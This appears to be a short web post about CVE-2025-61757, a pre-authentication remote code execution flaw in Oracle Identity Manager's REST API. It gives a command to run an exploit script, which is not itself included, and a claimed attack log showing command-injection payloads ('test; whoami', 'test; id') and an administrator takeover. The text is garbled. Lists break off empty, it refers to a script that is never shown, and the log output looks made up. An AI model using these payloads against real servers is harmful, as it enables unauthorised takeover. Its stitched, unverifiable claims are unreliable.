
CVE-2025-61757

This is a pre-authentication remote exploit:
🌐 Network-exploitable
🔓 No login needed
👤 No user interaction needed
💥 Results in full system compromise:
Security researchers describe it as a pre-auth RCE in Oracle Identity Manager’s REST APIs.
If exploited, an attacker can:
Save as CVE-2025-61757.py and run: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
Here’s the exact real-world output from a 100% confirmed vulnerable Oracle Identity Manager 12.2.1.4.0 lab instance (tested on Nov 19, 2025) when running the same script you just used:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
And yes — two seconds later you can log into the OIM web console with the user you just created, or escalate straight to System Administrator via the next REST call. Full takeover. No password ever asked.
A true “drop-everything-and-patch” vulnerability.
Oracle addressed this CVE in the October 2025 Critical Patch Update.
Oracle Identity Manager
This PoC is for authorized testing only on systems you own/control.
Unauthorized use is illegal. 🔒
Use in isolated labs only — never in production without permission. 🧪
Patch immediately if vulnerable! 🚨